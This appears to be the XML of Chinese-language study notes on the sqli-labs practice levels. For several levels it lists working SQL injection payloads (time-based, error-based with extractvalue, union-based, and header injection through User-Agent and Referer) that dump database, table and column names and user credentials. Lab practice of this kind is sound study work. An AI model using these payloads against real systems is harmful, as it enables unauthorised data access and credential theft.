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华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔注入</w:t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所有数据库得名称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http://www.sqli.com/Less-9/?id=1' and if((ord((select substr((select schema_name from information_schema.schemata limit 0,1),1,1))) = 105),sleep(3),sleep(0))  -- +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295400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699770"/>
            <wp:effectExtent l="0" t="0" r="381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ecurity数据库拥有得表名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http://www.sqli.com/Less-9/?id=1' and if(((select ord((select substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),1,1))) )= 117</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:num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>),sleep(3),sleep(0)) -- +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632585"/>
            <wp:effectExtent l="0" t="0" r="4445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601980"/>
            <wp:effectExtent l="0" t="0" r="889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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-9/?id=1' and if(((select ord((select substr((select column_name from information_schema.columns where table_name= 'users' limit 3,1),1,1))) )&gt;97</w:t>
            </w:r>
          </w:p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),sleep(3),sleep(0)) -- +&amp;XDEBUG_SESSION_START=PHPSTORM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1454150"/>
            <wp:effectExtent l="0" t="0" r="762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58800"/>
            <wp:effectExtent l="0" t="0" r="381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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-9/?id=1' and if(((select ord((select substr((select username from users limit 0,1),1,1)</w:t>
            </w:r>
          </w:p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))) = 68),sleep(3),sleep(0)) -- +&amp;XDEBUG_SESSION_START=PHPSTORM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869440"/>
            <wp:effectExtent l="0" t="0" r="4445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71135" cy="780415"/>
            <wp:effectExtent l="0" t="0" r="1905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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t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所有数据库得名称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admin') and extractvalue(1,concat(0x7e,(select group_concat(schema_name ) from information_schema.schemata limit 0,28 ))) -- %20') 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1311910"/>
            <wp:effectExtent l="0" t="0" r="6985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663575"/>
            <wp:effectExtent l="0" t="0" r="762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6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150" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="889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5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ecurity数据库拥有得表名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929" w:hRule="atLeast"/>
        </w:trPr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admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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073150"/>
            <wp:effectExtent l="0" t="0" r="127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523240"/>
            <wp:effectExtent l="0" t="0" r="635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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users' limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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249680"/>
            <wp:effectExtent l="0" t="0" r="1460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806450"/>
            <wp:effectExtent l="0" t="0" r="127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security数据库users表中的第一行数据的结果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admin') and extractvalue(1,concat(0x7e,(select group_concat(username ) from users limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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252220"/>
            <wp:effectExtent l="0" t="0" r="1905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5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2245" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="1079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布尔注入</w:t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所有数据库得名称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admin') and if((ord((select substr((select schema_name from information_schema.schemata limit 0,1),1,1))) = 105),sleep(3),sleep(0))    -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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508760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693420"/>
            <wp:effectExtent l="0" t="0" r="3175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ecurity数据库拥有得表名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admin')  and if(((select ord((select substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),1,1))) )= 117</w:t>
            </w:r>
          </w:p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),sleep(3),sleep(0))  -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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224915"/>
            <wp:effectExtent l="0" t="0" r="127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674370"/>
            <wp:effectExtent l="0" t="0" r="1270" b="114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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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admin')  and if(((select ord((select substr((select column_name from information_schema.columns where table_name= 'users' limit 3,1),1,1))) )&gt;97</w:t>
            </w:r>
          </w:p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),sleep(3),sleep(0))  -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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590675"/>
            <wp:effectExtent l="0" t="0" r="317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0975" cy="720090"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1143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security数据库users表中的第一行数据的结果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admin') and if(((select ord((select substr((select username from users limit 0,1),1,1) ))) = 68),sleep(3),sleep(0)) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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373505"/>
            <wp:effectExtent l="0" t="0" r="3175" b="133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655955"/>
            <wp:effectExtent l="0" t="0" r="5080" b="146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5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 w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t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所有数据库得名称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admin" and  extractvalue(1,concat(0x7e,(select group_concat(schema_name ) from information_schema.schemata limit 0,28 ))) -- %20') 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172210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ecurity数据库拥有得表名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admin"and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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243965"/>
            <wp:effectExtent l="0" t="0" r="1905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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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admin"and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name= 'users' limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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209675"/>
            <wp:effectExtent l="0" t="0" r="127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security数据库users表中的第一行数据的结果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admin"and extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,28 ))) -- %20')&amp;XDEBUG_SESSION_START=PHPSTORM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380490"/>
            <wp:effectExtent l="0" t="0" r="508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布尔注入</w:t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所有数据库得名称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admin</w:t>
            </w:r>
          </w:p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admin" and  (select concat(schema_name ) from information_schema.schemata limit 0,1) = 'information_schema'  -- %20 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405255"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1206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704215"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1206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ecurity数据库拥有得表名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admin" and  (select concat(table_name ) from information_schema.tables where table_schema = database() limit 3,1) = 'users'  -- %20 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342390"/>
            <wp:effectExtent l="0" t="0" r="0" b="139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718185"/>
            <wp:effectExtent l="0" t="0" r="5080" b="133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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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admin" and  (select concat(column_name ) from information_schema.columns where table_name = 'users' limit 2,1) = 'password'   -- %20 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962785"/>
            <wp:effectExtent l="0" t="0" r="127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527685"/>
            <wp:effectExtent l="0" t="0" r="5715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security数据库users表中的第一行数据的结果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admin" and  (select concat(username ) from users limit 0,1) = 'Dumb'  -- %20 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978025"/>
            <wp:effectExtent l="0" t="0" r="3175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华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t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所有数据库得名称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User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' or extractvalue(1, ncat(0x23,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>select group_concat(schema_name ) from information_schema.schemata limit 0,28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>,0x23))or'co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141095"/>
            <wp:effectExtent l="0" t="0" r="4445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4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ecurity数据库拥有得表名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User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' or extractvalue(1, concat(0x23,(select group_concat(table_name ) from information_schema.tables where SCHEMA_name = database() limit 0,28),0x23))or'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0340" cy="767715"/>
            <wp:effectExtent l="0" t="0" r="1270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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' or extractvalue(1, concat(0x23,(select group_concat(column_name ) from information_schema.columns where table_name = 'users' limit 0,28),0x23))or'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150" cy="551180"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1270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security数据库users表中的第一行数据的结果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User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' or extractvalue(1, concat(0x23,(select GROUP_CONCAt(username) users limit 0,28),0x23))or'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866775"/>
            <wp:effectExtent l="0" t="0" r="3175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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错注入</w:t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所有数据库得名称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Referer: http://www.sqli.com/' or extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,28 ))) or'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</w:p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910590"/>
            <wp:effectExtent l="0" t="0" r="13970" b="381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ecurity数据库拥有得表名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Referer: http://www.sqli.com/' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() </w:t>
            </w:r>
          </w:p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limit 0,28 ))) or'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160145"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1333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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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Referer: http://www.sqli.com/' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' </w:t>
            </w:r>
          </w:p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limit 0,28 ))) or'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020445"/>
            <wp:effectExtent l="0" t="0" r="3175" b="63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security数据库users表中的第一行数据的结果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Referer: http://www.sqli.com/' and extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,28 )))  or'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921385"/>
            <wp:effectExtent l="0" t="0" r="14605" b="825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2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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1541"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合查询</w:t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所有数据库得名称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http://www.sqli.com/Less-23/?id=-1' union select 1,2,(select group_concat(schema_name ) from information_schema.schemata)'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334770"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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ecurity数据库拥有得表名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http://www.sqli.com/Less-23/?id=-1' union select 1,2,(select group_concat(table_name ) from information_schema.tables where table_schema = database())'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150" cy="1183640"/>
            <wp:effectExtent l="0" t="0" r="8890" b="508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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-23/?id=-1' union select 1,2,(select group_concat(column_name ) from information_schema.columns where table_name ='users')'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247140"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="9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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-23/?id=-1' union select 1,2,(select group_concat(username) from users)'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1333500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="9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报错注入</w:t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所有数据库得名称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http://www.sqli.com/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,28 ))) </w:t>
            </w:r>
          </w:p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or '&amp;XDEBUG_SESSION_START=PHPSTORM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1322070"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="9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ecurity数据库拥有得表名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http://www.sqli.com/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,28 ))) </w:t>
            </w:r>
          </w:p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or '&amp;XDEBUG_SESSION_START=PHPSTORM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069340"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12700"/>
            <wp:docPr id="9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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,28 ))) </w:t>
            </w:r>
          </w:p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or '&amp;XDEBUG_SESSION_START=PHPSTORM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099185"/>
            <wp:effectExtent l="0" t="0" r="14605" b="13335"/>
            <wp:docPr id="9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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-23/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,28 ))) </w:t>
            </w:r>
          </w:p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or '&amp;XDEBUG_SESSION_START=PHPSTORM</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/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332230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="10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布尔注入</w:t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所有数据库得名称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http://www.sqli.com/Less-23/?id=1' and ord((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select SUBSTR(((select concat(schema_name ) from information_schema.schemata limit 0,1)),1,1))) = 105 or '&amp;XDEBUG_SESSION_START=PHPSTORM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347470"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="9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ecurity数据库拥有得表名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http://www.sqli.com/Less-23/?id=1' and ord((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select SUBSTR(((select concat(table_name ) from information_schema.tables where table_schema = database() limit 0,1)),1,1))) &lt;105 or '&amp;XDEBUG_SESSION_START=PHPSTORM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209040"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10160"/>
            <wp:docPr id="9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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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176020"/>
            <wp:effectExtent l="0" t="0" r="3175" b="12700"/>
            <wp:docPr id="9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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-23/?id=1' and ( select ord((select substr(( select concat(username) from users limit 2,1),1,1))) &lt; 112)</w:t>
            </w:r>
          </w:p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or '&amp;XDEBUG_SESSION_START=PHPSTORM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448435"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="9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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合查询</w:t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所有数据库得名称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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' union select 1,database(),(select group_concat(schema_name ) from infoorrmation_schema.schemata)'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875030"/>
            <wp:effectExtent l="0" t="0" r="3810" b="889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ecurity数据库拥有得表名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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema = database()),(select group_concat(schema_name ) from infoorrmation_schema.schemata)'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150" cy="816610"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name = 'users'),(select group_concat(username,passwoorrd) from users)'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651510"/>
            <wp:effectExtent l="0" t="0" r="4445" b="381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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name = 'users'),(select group_concat(username,passwoorrd) from users)'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651510"/>
            <wp:effectExtent l="0" t="0" r="4445" b="381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报错注入</w:t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所有数据库得名称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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' oorr  and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,28 ))) --+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548765"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715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4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ecurity数据库拥有得表名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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' oorr  and extractvalue(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema = database() limit 0,28 ))) --+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2880" cy="1536065"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3175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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' oorr  and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_name = 'users' limit 0,28 ))) --+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068070"/>
            <wp:effectExtent l="0" t="0" r="635" b="13970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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=-1' oorr  and extractvalue(1,concat(0x7e,(select group_concat(username,passwoorrd) from users limit 0,28 ))) --+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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="948690"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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布尔注入</w:t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所有数据库得名称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tabs>
                <w:tab w:val="left" w:pos="1877"/>
              </w:tabs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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1877"/>
              </w:tabs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?id=1'  anandd (oorrd((select substr((select concat(schema_name) from infoorrmation_schema.schemata limit 0,1),1,1)))) = 105--+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2880" cy="708025"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8255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0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ecurity数据库拥有得表名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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=1'  anandd  (oorrd((select substr((select table_name from infoorrmation_schema.tables where table_schema = database() limit 0,1),1,1)))) = 101 --+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0975" cy="730250"/>
            <wp:effectExtent l="0" t="0" r="12065" b="127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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库,users表中的所有字段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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=1'  anandd  (oorrd((select substr((select column_name from infoorrmation_schema.columns where table_name = 'users' limit 0,1),1,1)))) =105 --+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643890"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1143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security数据库users表中的第一行数据的结果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http://www.sqli.com/Less-25/</w:t>
            </w:r>
          </w:p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?id=1'  anandd  (oorrd((select SUBSTR((select username from users limit 0,1),1,1)))) = 68 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文宋体" w:hAnsi="华文宋体" w:eastAsia="华文宋体" w:cs="华文宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
